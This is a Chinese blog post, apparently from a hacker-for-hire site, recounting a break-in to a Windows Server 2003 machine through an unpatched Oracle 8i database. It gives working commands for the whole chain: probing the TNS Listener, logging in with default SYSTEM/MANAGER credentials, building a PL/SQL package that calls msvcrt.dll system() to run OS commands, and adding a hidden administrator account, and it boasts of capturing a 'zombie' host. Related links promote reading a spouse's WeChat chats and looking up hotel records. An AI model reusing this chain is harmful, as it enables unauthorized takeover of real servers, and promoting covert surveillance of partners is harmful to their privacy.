一次通过 Oracle8i 入侵系统之旅

访客3年前关于黑客接单1138

最近看了些有关 Oracle 的安全资料,看后随手做了一个渗透测试,把过程记录下来方便日后查阅.。先用 SuperScan4.0 扫描下要测试的主机,速度很快,结果如图 1 所示:

图 1

端口 1521 是 Oracle 的 TNS Listener 默认监听的端口,通过扫描报告还可以看到 Oracle 的版本为 8i.现在还不 知道对方的操作系统版本,看到主机还开放了终端服务,直接连上去看下操作系统版本.如图 2,

图 2

确定操作系统版本为 Windows Server 2003 企业版。Oracle 10g 之前的版本默认情况下是允许远程管理 TNS Listener 的,这台主机的 Oracle 版本为 8i,我们通过 TNS Listenner 来收集下更多的详细信息.如果本地安装了 Oracle 可以直接调用 Lsnrctl 连接到测试的主机,如图 3 所示:

图 3

通过输入"status "命令我们可以得到 oracle 详细版本(8.1.70.0),操作系统(Windows),跟踪级别为 OFF(说明没有开启审核),安全性为 OFF(说明没有设置 Listener 口令),日志文件的绝对路径(判断 Oracle 安装路径),数据库的 SID(ccdr).

要远程管理 Oracle, 需要知道 IP,数据库的 SID,和连接的用户名和密码.IP 和 SID 我们已经知道了. 接下来用oscanner 工具扫描下要测试主机是否存在默认的密码.如图 4 所示.

图 4

看来 管 理 员 安 装 完 Oracle8i 后就 没 有 进 行 进 一 步 的 安 全 配 置 , 所有 的 用 户 名 密 码 都 是 默 认 的 . 在
Oracle 中,SYS/SYSTEM 都是具有 DBA 权限的帐户,我这里选择使用 SYSTEM/MA NAGER 来连接数据库.

在本地用 Sqlplus 连接到目标 Oracle 数据库,命令为:
SqlPlus system/manager@//victimip:1521/ccdr
,
连接成功 后,可以通过 PL/SQL 来运行 OS 命令,首先需要创建库来定位 msvcrt.dll 文件.这里需要使用完整的路径,通过刚才
对主机的 查点 我们 已经 知道 操作 系统为 win2003, 如果系统 安装 到 C 盘的话 , 那 msvcrt.dll 默认路径 就为
c:\windows\system32\msvcrt.dll.创建库的命令如下:
CREATE OR REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll';

接下来写一个过程来调用 msvcrt.dll 里的 system()函数.命令如下:
CREATE OR REPLACE PACKAGE oracmd IS
PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
CREATE ORE REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec (cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/

创建完后,就可以运行 OS 命令了.由于主机已经开放了终端服务,所以我这里添加个管理员,然后连接服务器.命 令如下:
exec oracmd.exec ('net user mickey imissyou /add');
exec oracmd.exec ('net localgroup administrators mickey /add');

帐户创建完成后,如图 5,就可以连接终端服务了,一台肉鸡到手了.:-)

标签: 好话题

相关文章

华为手机怎么查微信删除的聊天记录(老公聊完微信就删掉教你找回来)

记忆不能立马删除,微信聊天记录却可以。有些记忆删除了可能无法恢复,可微信聊天记录通过一定的方法却可以恢复。我们总会不经意间删除某些微信聊天记录,之后却发现里面有很重要的信息,然后就会想着怎么才能...

用自己手机查老婆和别人聊天,这个办法非常不错

用自己手机查老婆和别人聊天 1.微信曾经成为咱们与身边的人、亲戚等交换的紧张对象,利便适用。但每件事都有好有坏,微信也不破例。有几许伉俪由于对方频仍探求左近的人和接洽人而成为仇敌?诈骗微信、嘲弄微信...

微信一天到底能转账多少钱_微信一天能转账多少钱多少次?这些你都知道吗?

微信是一款面向只能终端的即时通讯软件。可以为我们提供大量的服务。其中包括:聊天、朋友圈、公众平台、微信小程序、微信支付等。为我们的生活带来了更多的乐趣,同时也为我们提供了很大的方便。聊天功能可以帮助我...

疑似旺旺、YY、QQ、微信等6家聊天工具的明文数据库被放在公网_数据库

据推特消息, 感谢黑客0xDUDE的发现,让我们知道了,每个中国大陆地区的普通民众的聊天记录,所有的聊天记录内容,至少从2018年开始的,都是被明文记录在公网的分布式数据库里的,以便警方的调阅和审查...

苹果2019年回购股票花了671亿美元,对股东来说比领分红更划算

1月14日消息,据外媒报道,如果拥有数百亿美米的自由现金流可以进行投资或分给股东当分红,大多数公司可能都会兴奋不已。苹果就是一家拥有这类“困扰”的科技巨头之一。在2019财年,苹果支付了141亿美米的...

2019在线查开放房网址 2000万查房网网址

【编者按】当你和一对夫妇住在酒店时,你会遇到“警察”来检查房间。你怎么能证明这段关系?当旅游已经成为一种流行的加压方式时,越来越多的人会选择在假期来临时与亲朋好友见面或带着另一半去旅游。一路上,他们会...